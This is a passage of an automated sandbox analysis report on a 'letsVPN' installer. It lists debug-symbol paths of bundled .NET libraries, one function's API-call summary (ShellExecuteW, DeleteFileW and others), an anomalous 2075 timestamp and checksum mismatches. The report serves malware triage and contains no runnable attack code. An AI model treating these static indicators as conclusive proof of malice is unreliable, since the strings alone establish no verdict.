              Source: Binary string: C:\Users\ani\code\squirrel\squirrel.windows\build\obj\Squirrel\Release\net45\Squirrel.pdbSHA256 source: letsvpn-latest.exe, 00000015.00000003.2393237093.0000000003106000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.Configuration.ConfigurationManager/net461-windows-Release/System.Configuration.ConfigurationManager.pdb source: letsvpn-latest.exe, 00000015.00000003.2402252974.0000000003109000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Console\4.0.2.0\System.Console.pdb source: letsvpn-latest.exe, 00000015.00000003.2403088896.0000000003102000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\_work\1\s\corefx\bin\obj\AnyOS.AnyCPU.Release\System.Memory\netfx\System.Memory.pdb source: letsvpn-latest.exe, 00000015.00000003.2441458716.0000000003108000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.ComponentModel.EventBasedAsync\4.0.11.0\System.ComponentModel.EventBasedAsync.pdb source: letsvpn-latest.exe, 00000015.00000003.2399584071.0000000003100000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Reflection.Primitives\4.0.1.0\System.Reflection.Primitives.pdb$*>* 0*_CorDllMainmscoree.dll source: letsvpn-latest.exe, 00000015.00000003.2458361290.0000000003100000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\65\s\corefx\bin/obj/Windows_NT.AnyCPU.Release/System.IO.Pipes.AccessControl/netfx\System.IO.Pipes.AccessControl.pdb/5I5 ;5_CorDllMainmscoree.dll source: letsvpn-latest.exe, 00000015.00000003.2433009064.000000000310A000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Diagnostics.TraceSource\4.0.2.0\System.Diagnostics.TraceSource.pdb source: letsvpn-latest.exe, 00000015.00000003.2420126748.0000000003104000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.IO.UnmanagedMemoryStream\4.0.3.0\System.IO.UnmanagedMemoryStream.pdb source: letsvpn-latest.exe, 00000015.00000003.2435251638.0000000003108000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Threading.Timer\4.0.1.0\System.Threading.Timer.pdbt( source: letsvpn-latest.exe, 00000015.00000003.2501476791.000000000310A000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\sources\cecil\symbols\pdb\obj\Release\net40\Mono.Cecil.Pdb.pdb source: letsvpn-latest.exe, 00000015.00000003.2377740125.0000000003105000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: InternalNameMono.Cecil.Pdb.dllf! source: letsvpn-latest.exe, 00000015.00000003.2377740125.0000000003105000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\s\LetsVPNInfraStructure\obj\Release\LetsVPNInfraStructure.pdb source: letsvpn-latest.exe, 00000015.00000003.2365820399.0000000003107000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 0000003D.00000002.3417897670.00000000060D2000.00000002.00000001.01000000.00000025.sdmp
              Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.CompilerServices.Unsafe\net461-Release\System.Runtime.CompilerServices.Unsafe.pdbBSJB source: letsvpn-latest.exe, 00000015.00000003.2462305635.000000000310C000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 0000003D.00000002.3417027693.00000000058E2000.00000002.00000001.01000000.00000023.sdmp
              Source: Binary string: C:\Users\eric\dev\SQLitePCL.raw\src\SQLitePCLRaw.core\obj\Release\netstandard2.0\SQLitePCLRaw.core.pdbSHA256xpRb source: letsvpn-latest.exe, 00000015.00000003.2385172064.0000000003109000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.Data.OleDb/net461-windows-Release/System.Data.OleDb.pdbSHA256 source: letsvpn-latest.exe, 00000015.00000003.2406641167.0000000003106000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: Microsoft.IdentityModel.pdb source: letsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Net.Security\4.0.2.0\System.Net.Security.pdb source: letsvpn-latest.exe, 00000015.00000003.2452861918.0000000003108000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.ServiceModel.NetTcp.Facade/Release/net461/System.ServiceModel.NetTcp.pdbSHA256 source: letsvpn-latest.exe, 00000015.00000003.2486208547.000000000310D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\GitWorkspace\AvalonEdit\ICSharpCode.AvalonEdit\obj\Release\net45\ICSharpCode.AvalonEdit.pdbSHA256 source: letsvpn-latest.exe, 00000015.00000003.2352114533.000000000310F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: WebView2Loader.dll.pdb}> source: letsvpn-latest.exe, 00000015.00000003.2549736766.000000000310F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Runtime.Numerics\4.0.1.0\System.Runtime.Numerics.pdb source: letsvpn-latest.exe, 00000015.00000003.2466277974.0000000003101000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\1795\s\corefx\bin/obj/Windows_NT.AnyCPU.Release/System.IO.Compression/netfx\System.IO.Compression.pdb source: letsvpn-latest.exe, 00000015.00000003.2426450844.000000000310F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\sources\cecil\symbols\mdb\obj\Release\net40\Mono.Cecil.Mdb.pdbSHA256_- source: letsvpn-latest.exe, 00000015.00000003.2376938176.000000000310A000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\IEUser\pusher-websocket-dotnet\PusherClient\obj\release\net46\PusherClient.pdbSHA256 source: letsvpn-latest.exe, 00000015.00000003.2381608570.0000000003100000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Xml.XmlSerializer\4.0.11.0\System.Xml.XmlSerializer.pdb source: letsvpn-latest.exe, 00000015.00000003.2509600299.0000000003102000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.Threading.AccessControl/net461-windows-Release/System.Threading.AccessControl.pdbSHA256 source: letsvpn-latest.exe, 00000015.00000003.2492363095.000000000310E000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.ComponentModel.TypeConverter\4.1.2.0\System.ComponentModel.TypeConverter.pdb source: letsvpn-latest.exe, 00000015.00000003.2400835313.000000000310D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Runtime.Handles\4.0.1.0\System.Runtime.Handles.pdb,)F) 8)_CorDllMainmscoree.dll source: letsvpn-latest.exe, 00000015.00000003.2464168629.0000000003100000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Reflection.Extensions\4.0.1.0\System.Reflection.Extensions.pdb source: letsvpn-latest.exe, 00000015.00000003.2457911056.0000000003108000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.Security.AccessControl/net461-windows-Release/System.Security.AccessControl.pdb source: letsvpn-latest.exe, 00000015.00000003.2470703706.0000000003105000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.AppContext\4.1.2.0\System.AppContext.pdb source: letsvpn-latest.exe, 00000015.00000003.2394362077.0000000003107000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\s\Utils\obj\Release\Utils.pdb source: letsvpn-latest.exe, 00000015.00000003.2511835079.0000000003107000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 0000003B.00000002.2707489755.0000000002AE2000.00000002.00000001.01000000.0000001B.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Collections.Concurrent\4.0.11.0\System.Collections.Concurrent.pdb source: letsvpn-latest.exe, 00000015.00000003.2396511276.0000000003105000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Net.NetworkInformation\4.1.2.0\System.Net.NetworkInformation.pdb source: letsvpn-latest.exe, 00000015.00000003.2449881395.0000000003109000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: Mono.Cecil.Pdb source: letsvpn-latest.exe, 00000015.00000003.2377740125.0000000003105000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: ZMono.Cecil.Pdb, PublicKey=00240000048000009400000006020000002400005253413100040000010001002b5c9f7f04346c324a3176f8d3ee823bbf2d60efdbc35f86fd9e65ea3e6cd11bcdcba3a353e55133c8ac5c4caaba581b2c6dfff2cc2d0edc43959ddb86b973300a479a82419ef489c3225f1fe429a708507bd515835160e10bc743d20ca33ab9570cfd68d479fcf0bc797a763bec5d1000f0159ef619e709d915975e87beebaf source: letsvpn-latest.exe, 00000015.00000003.2379243714.000000000310A000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.ObjectModel\4.0.11.0\System.ObjectModel.pdb source: letsvpn-latest.exe, 00000015.00000003.2457151708.0000000003101000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\1795\s\corefx\bin/obj/Windows_NT.AnyCPU.Release/System.Globalization.Extensions/netfx\System.Globalization.Extensions.pdb source: letsvpn-latest.exe, 00000015.00000003.2424368013.000000000310D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\eric\dev\cb\bld\bin\e_sqlite3\win\v141\plain\x86\e_sqlite3.pdb source: letsvpn-latest.exe, 00000015.00000003.2547019952.000000000310E000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Runtime.CompilerServices.VisualC\4.0.2.0\System.Runtime.CompilerServices.VisualC.pdb source: letsvpn-latest.exe, 00000015.00000003.2463035170.0000000003108000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\s\SDK\AppCenterAnalytics\Microsoft.AppCenter.Analytics.WindowsDesktop\obj\Release\net461\Microsoft.AppCenter.Analytics.pdbSHA256 source: letsvpn-latest.exe, 00000015.00000003.2367415267.0000000003105000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\WorkShop\WebSocket4Net\WebSocket4Net\obj\Release\WebSocket4Net.pdb source: letsvpn-latest.exe, 00000015.00000003.2512523323.000000000310F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Threading.Tasks\4.0.11.0\System.Threading.Tasks.pdb source: letsvpn-latest.exe, 00000015.00000003.2495009725.0000000003104000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/Microsoft.Win32.Registry.AccessControl/net461-windows-Release/Microsoft.Win32.Registry.AccessControl.pdb source: letsvpn-latest.exe, 00000015.00000003.2374971901.000000000310C000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\MdXaml\artifacts\obj\MdXaml\Release\net45\MdXaml.pdbSHA256/T source: letsvpn-latest.exe, 00000015.00000003.2366742475.000000000310E000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: netstandard.pdb.mdb source: letsvpn-latest.exe, 00000015.00000003.2345688003.0000000003103000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2379243714.000000000310A000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Security.Cryptography.Primitives\4.0.2.0\System.Security.Cryptography.Primitives.pdb source: letsvpn-latest.exe, 00000015.00000003.2479247746.0000000003108000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.Diagnostics.EventLog/net461-Release/System.Diagnostics.EventLog.pdbSHA256~ source: letsvpn-latest.exe, 00000015.00000003.2410824087.0000000003102000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\1795\s\corefx\bin/obj/AnyOS.AnyCPU.Release/System.Security.SecureString/netfx\System.Security.SecureString.pdbf) source: letsvpn-latest.exe, 00000015.00000003.2484061202.0000000003105000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Runtime.InteropServices\4.1.2.0\System.Runtime.InteropServices.pdbH5b5 T5_CorDllMainmscoree.dll source: letsvpn-latest.exe, 00000015.00000003.2465608542.0000000003104000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Diagnostics.TextWriterTraceListener\4.0.2.0\System.Diagnostics.TextWriterTraceListener.pdb source: letsvpn-latest.exe, 00000015.00000003.2414685482.0000000003101000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Resources.Reader\4.0.2.0\System.Resources.Reader.pdbl( source: letsvpn-latest.exe, 00000015.00000003.2459711071.0000000003104000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\sources\cecil\symbols\pdb\obj\Release\net40\Mono.Cecil.Pdb.pdbSHA256 source: letsvpn-latest.exe, 00000015.00000003.2377740125.0000000003105000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.Web.Services.Description/Release/net461/System.Web.Services.Description.pdb source: letsvpn-latest.exe, 00000015.00000003.2503983529.0000000003105000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.IO.IsolatedStorage\4.0.2.0\System.IO.IsolatedStorage.pdb source: letsvpn-latest.exe, 00000015.00000003.2430770460.0000000003107000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\1795\s\corefx\bin/obj/AnyOS.AnyCPU.Release/System.Xml.XPath.XDocument/netfx\System.Xml.XPath.XDocument.pdb source: letsvpn-latest.exe, 00000015.00000003.2507336044.0000000003107000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.Data.Odbc/net461-windows-Release/System.Data.Odbc.pdb source: letsvpn-latest.exe, 00000015.00000003.2405745648.000000000310B000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Security.Cryptography.X509Certificates\4.1.2.0\System.Security.Cryptography.X509Certificates.pdb source: letsvpn-latest.exe, 00000015.00000003.2480592822.000000000310F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Linq.Expressions\4.1.2.0\System.Linq.Expressions.pdb source: letsvpn-latest.exe, 00000015.00000003.2436998881.000000000310F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Security.Cryptography.Csp\4.0.2.0\System.Security.Cryptography.Csp.pdb source: letsvpn-latest.exe, 00000015.00000003.2477452531.0000000003105000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\projects\sqlite-net-extensions\SQLiteNetExtensionsAsync\obj\Release\netstandard1.1\SQLiteNetExtensionsAsync.pdb source: letsvpn-latest.exe, 00000015.00000003.2383763587.0000000003106000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\s\third_party\edge_webview2\win\wpf_control\Microsoft.Web.WebView2.Wpf\obj\release\net45\Microsoft.Web.WebView2.Wpf.pdb source: letsvpn-latest.exe, 00000015.00000003.2373633715.0000000003109000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.Security.Cryptography.Xml/net461-windows-Release/System.Security.Cryptography.Xml.pdbSHA256 source: letsvpn-latest.exe, 00000015.00000003.2481329381.000000000310C000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Net.Requests\4.0.11.0\System.Net.Requests.pdbX)r) d)_CorDllMainmscoree.dll source: letsvpn-latest.exe, 00000015.00000003.2452215583.000000000310D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: c:\Users\Todd\Source\Repos\DeltaCompressionDotNet\DeltaCompressionDotNet\obj\Release\DeltaCompressionDotNet.pdb source: letsvpn-latest.exe, 00000015.00000003.2349256901.0000000003105000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\156\s\corefx\bin\obj\AnyOS.AnyCPU.Release\System.Buffers\netfx\System.Buffers.pdb source: letsvpn-latest.exe, 00000015.00000003.2394947957.000000000310F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Security.Cryptography.Encoding\4.0.2.0\System.Security.Cryptography.Encoding.pdbT)n) `)_CorDllMainmscoree.dll source: letsvpn-latest.exe, 00000015.00000003.2478011371.000000000310A000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\156\s\corefx\bin\obj\AnyOS.AnyCPU.Release\System.Threading.Tasks.Extensions\netfx\System.Threading.Tasks.Extensions.pdb source: letsvpn-latest.exe, 00000015.00000003.2493596023.0000000003105000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\s\SDK\AppCenterCrashes\Microsoft.AppCenter.Crashes.WindowsDesktop\obj\Release\net461\Microsoft.AppCenter.Crashes.pdbSHA256, source: letsvpn-latest.exe, 00000015.00000003.2368187744.0000000003107000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.AppContext\4.1.2.0\System.AppContext.pdb<(V( H(_CorDllMainmscoree.dll source: letsvpn-latest.exe, 00000015.00000003.2394362077.0000000003107000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Diagnostics.Process\4.1.2.0\System.Diagnostics.Process.pdb source: letsvpn-latest.exe, 00000015.00000003.2413088913.000000000310B000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.ServiceModel.Primitives.Facade/Release/net461/System.ServiceModel.Primitives.pdb source: letsvpn-latest.exe, 00000015.00000003.2486911961.0000000003109000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.ServiceProcess.ServiceController/net461-windows-Release/System.ServiceProcess.ServiceController.pdbSHA256 source: letsvpn-latest.exe, 00000015.00000003.2488820018.000000000310E000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\WorkShop\WebSocket4Net\WebSocket4Net\obj\Release\WebSocket4Net.pdb* source: letsvpn-latest.exe, 00000015.00000003.2512523323.000000000310F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.Security.Cryptography.Cng/net462-Windows_NT-Release/System.Security.Cryptography.Cng.pdbSHA256,C+U7 source: letsvpn-latest.exe, 00000015.00000003.2476891907.0000000003100000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\WorkShop\SuperSocket.Clientuser\obj\Release\SuperSocket.Clientuser.pdbR source: letsvpn-latest.exe, 00000015.00000003.2393796689.0000000003100000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Linq.Queryable\4.0.1.0\System.Linq.Queryable.pdb source: letsvpn-latest.exe, 00000015.00000003.2438332844.0000000003104000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net45/Newtonsoft.Json.pdbSHA256 source: letsvpn-latest.exe, 00000015.00000003.2380231891.0000000003105000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 0000003B.00000002.2711648046.0000000005742000.00000002.00000001.01000000.0000001E.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Xml.XmlDocument\4.0.3.0\System.Xml.XmlDocument.pdb source: letsvpn-latest.exe, 00000015.00000003.2508751976.0000000003109000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Threading.Thread\4.0.2.0\System.Threading.Thread.pdb source: letsvpn-latest.exe, 00000015.00000003.2496112419.0000000003108000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\projects\wpfanimatedgif\WpfAnimatedGif\obj\Release\net40\WpfAnimatedGif.pdb source: letsvpn-latest.exe, 00000015.00000003.2513494263.0000000003103000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.CodeDom/net461-Release/System.CodeDom.pdb source: letsvpn-latest.exe, 00000015.00000003.2395719645.0000000003105000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.Diagnostics.PerformanceCounter/net461-Release/System.Diagnostics.PerformanceCounter.pdb source: letsvpn-latest.exe, 00000015.00000003.2412144630.0000000003105000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\Microsoft.Win32.Primitives\4.0.3.0\Microsoft.Win32.Primitives.pdb source: letsvpn-latest.exe, 00000015.00000003.2374293880.0000000003107000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\projects\ipnetwork\src\System.Net.IPNetwork\obj\release\net46\System.Net.IPNetwork.pdb source: letsvpn-latest.exe, 00000015.00000003.2448378119.0000000003102000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Text.Encoding\4.0.11.0\System.Text.Encoding.pdb source: letsvpn-latest.exe, 00000015.00000003.2490972504.000000000310E000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Security.Claims\4.0.3.0\System.Security.Claims.pdb source: letsvpn-latest.exe, 00000015.00000003.2475844449.0000000003105000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\Code\SVGImage\Source\SVGImage\obj\Release\net46\SVGImage.pdb source: letsvpn-latest.exe, 00000015.00000003.2387449334.0000000003101000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.Data.SqlClient/net461-Windows_NT-Release/System.Data.SqlClient.pdb source: letsvpn-latest.exe, 00000015.00000003.2407414987.0000000003101000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\sources\cecil\symbols\mdb\obj\Release\net40\Mono.Cecil.Mdb.pdb source: letsvpn-latest.exe, 00000015.00000003.2376938176.000000000310A000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.Security.Cryptography.Pkcs/net461-windows-Release/System.Security.Cryptography.Pkcs.pdb source: letsvpn-latest.exe, 00000015.00000003.2478524484.0000000003100000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\projects\sqlite-net-extensions\SQLiteNetExtensions\obj\Release\SQLiteNetExtensions.pdb source: letsvpn-latest.exe, 00000015.00000003.2383107440.0000000003109000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\39\s\corefx\bin\obj\AnyOS.AnyCPU.Release\System.ValueTuple\netfx\System.ValueTuple.pdb source: letsvpn-latest.exe, 00000015.00000003.2503243921.0000000003108000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.IO.FileSystem.Primitives\4.0.3.0\System.IO.FileSystem.Primitives.pdb source: letsvpn-latest.exe, 00000015.00000003.2428597566.000000000310F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Diagnostics.FileVersionInfo\4.0.2.0\System.Diagnostics.FileVersionInfo.pdbp( source: letsvpn-latest.exe, 00000015.00000003.2411480070.000000000310F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\s\SDK\AppCenterAnalytics\Microsoft.AppCenter.Analytics.WindowsDesktop\obj\Release\net461\Microsoft.AppCenter.Analytics.pdb source: letsvpn-latest.exe, 00000015.00000003.2367415267.0000000003105000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: c:\users\samuli\opt\tap-windows6-mattock\tapinstall\7600\objfre_wlh_amd64\amd64\tapinstall.pdbH source: letsvpn-latest.exe, 00000015.00000003.2343440386.000000000310D000.00000004.00000020.00020000.00000000.sdmp, tapinstall.exe, 00000021.00000000.2603866703.00007FF796191000.00000020.00000001.01000000.00000017.sdmp, tapinstall.exe, 00000021.00000002.2606131178.00007FF796191000.00000020.00000001.01000000.00000017.sdmp, tapinstall.exe, 00000023.00000000.2607796952.00007FF796191000.00000020.00000001.01000000.00000017.sdmp, tapinstall.exe, 00000023.00000002.2660016264.00007FF796191000.00000020.00000001.01000000.00000017.sdmp, tapinstall.exe, 00000029.00000000.2665972836.00007FF796191000.00000020.00000001.01000000.00000017.sdmp, tapinstall.exe, 00000029.00000002.2668002400.00007FF796191000.00000020.00000001.01000000.00000017.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Net.Requests\4.0.11.0\System.Net.Requests.pdb source: letsvpn-latest.exe, 00000015.00000003.2452215583.000000000310D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\1795\s\corefx\bin/obj/Windows_NT.AnyCPU.Release/System.IO.Compression/netfx\System.IO.Compression.pdb]W source: letsvpn-latest.exe, 00000015.00000003.2426450844.000000000310F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/Microsoft.Win32.SystemEvents/net461-Release/Microsoft.Win32.SystemEvents.pdb source: letsvpn-latest.exe, 00000015.00000003.2376355832.0000000003102000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Runtime.Extensions\4.1.2.0\System.Runtime.Extensions.pdb source: letsvpn-latest.exe, 00000015.00000003.2463704916.000000000310F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\1795\s\corefx\bin/obj/Windows_NT.AnyCPU.Release/System.Net.Sockets/netfx\System.Net.Sockets.pdb source: letsvpn-latest.exe, 00000015.00000003.2453530539.0000000003102000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Collections\4.0.11.0\System.Collections.pdb source: letsvpn-latest.exe, 00000015.00000003.2398236397.0000000003109000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Net.WebSockets\4.0.2.0\System.Net.WebSockets.pdb source: letsvpn-latest.exe, 00000015.00000003.2455726262.0000000003101000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/Microsoft.Toolkit.Uwp.Notifications/obj/Release/net461/Microsoft.Toolkit.Uwp.Notifications.pdbSHA256 source: letsvpn-latest.exe, 00000015.00000003.2371393124.000000000310F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\1795\s\corefx\bin/obj/AnyOS.AnyCPU.Release/System.Diagnostics.StackTrace/netfx\System.Diagnostics.StackTrace.pdb$.>. 0._CorDllMainmscoree.dll source: letsvpn-latest.exe, 00000015.00000003.2413846531.0000000003101000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Runtime.Serialization.Json\4.0.1.0\System.Runtime.Serialization.Json.pdb source: letsvpn-latest.exe, 00000015.00000003.2467599603.0000000003101000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.IO.MemoryMappedFiles\4.0.2.0\System.IO.MemoryMappedFiles.pdb source: letsvpn-latest.exe, 00000015.00000003.2431492530.0000000003103000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Globalization.Calendars\4.0.3.0\System.Globalization.Calendars.pdb source: letsvpn-latest.exe, 00000015.00000003.2423705270.000000000310C000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.ServiceModel.Security.Facade/Release/net461/System.ServiceModel.Security.pdb source: letsvpn-latest.exe, 00000015.00000003.2487551781.0000000003103000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.Diagnostics.EventLog/net461-Release/System.Diagnostics.EventLog.pdb source: letsvpn-latest.exe, 00000015.00000003.2410824087.0000000003102000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\s\SDK\AppCenter\Microsoft.AppCenter.WindowsDesktop\obj\Release\net461\Microsoft.AppCenter.pdbSHA256X7 source: letsvpn-latest.exe, 00000015.00000003.2369093669.000000000310B000.00000004.00000020.00020000.00000000.sdmp
              Source: System.Web.Services.Description.resources.dll.21.dr Static PE information: 0xC5D8F728 [Sat Mar 9 04:16:40 2075 UTC]
              Source: C:\Users\user\Desktop\letsVPN.exe Code function: 0_2_00000001800057CD LoadLibraryW,GetProcAddress,ShellExecuteW,LoadLibraryW,GetProcAddress,Sleep,SleepEx,DeleteFileW,CreateDirectoryW,Sleep,SleepEx,Sleep,SleepEx,ShellExecuteW,Sleep,SleepEx,Sleep,SleepEx,DeleteFileW,DeleteFileW,DeleteFileW,std::ios_base::_Ios_base_dtor, 0_2_00000001800057CD
              Source: nsDialogs.dll.21.dr Static PE information: real checksum: 0x0 should be: 0x11042
              Source: FileSplit.exe.0.dr Static PE information: real checksum: 0x0 should be: 0x19e98
              Source: nsExec.dll.21.dr Static PE information: real checksum: 0x0 should be: 0x939f
              Source: System.dll.21.dr Static PE information: real checksum: 0x0 should be: 0x39be
